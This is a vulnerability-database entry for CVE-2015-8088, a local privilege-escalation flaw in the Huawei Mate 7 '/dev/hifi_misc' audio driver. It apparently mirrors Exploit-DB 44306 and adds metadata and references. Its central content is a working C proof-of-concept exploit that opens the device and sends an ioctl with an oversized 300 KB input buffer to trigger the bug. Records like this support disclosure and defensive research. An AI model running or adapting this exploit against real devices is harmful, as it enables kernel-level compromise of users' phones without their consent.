ID
VAR-E-201601-0355
CVE
| cve_id: | CVE-2015-8088 | Trust: 1.0 |
EDB ID
44306
TITLE
Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation - Hardware local Exploit
Trust: 1.0
DESCRIPTION
Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation. CVE-2015-8088 . local exploit for Hardware platform
Trust: 1.0
AFFECTED PRODUCTS
| vendor: | huawei | model: | mate | scope: | eq | version: | 7 | Trust: 1.0 |
EXPLOIT
/*
*
* HuaWei Mate7 hifi driver Poc
*
* Writen by pray3r, <pray3r.z@gmail.com>
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#define HIFI_MISC_IOCTL_WRITE_PARAMS _IOWR('A', 0x75, struct misc_io_sync_param)
struct misc_io_sync_param {
void * para_in;
unsigned int para_size_in;
void * para_out;
unsigned int para_size_out;
};
int main(int arg, char **argv)
{
int fd;
void *in = malloc(300 * 1024);
void *out = malloc(100);
struct misc_io_sync_param poc;
poc.para_in = in;
poc.para_size_in = 300 * 1024;
poc.para_out = out;
poc.para_size_out = 100;
fd = open("/dev/hifi_misc", O_RDWR);
ioctl(fd, HIFI_MISC_IOCTL_WRITE_PARAMS, &poc);
free(in);
free(out);
return 0;
}
Trust: 1.0
EXPLOIT LANGUAGE
c
Trust: 1.0
PRICE
free
Trust: 1.0
TYPE
'/dev/hifi_misc' Privilege Escalation
Trust: 1.0
CREDITS
pray3r
Trust: 1.0
EXTERNAL IDS
| db: | NVD | id: | CVE-2015-8088 | Trust: 1.0 |
| db: | EXPLOIT-DB | id: | 44306 | Trust: 1.0 |
REFERENCES
| url: | https://github.com/hardenedlinux/offensive_poc/blob/0cfe3764a0388e3715b018d1d59ef801f8b16b73/cve-2015-8088/cve-2015-8088-poc.c | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2015-8088 | Trust: 1.0 |
SOURCES
| db: | EXPLOIT-DB | id: | 44306 |
LAST UPDATE DATE
2022-07-27T09:37:45.741000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 44306 | date: | 2016-01-24T00:00:00 |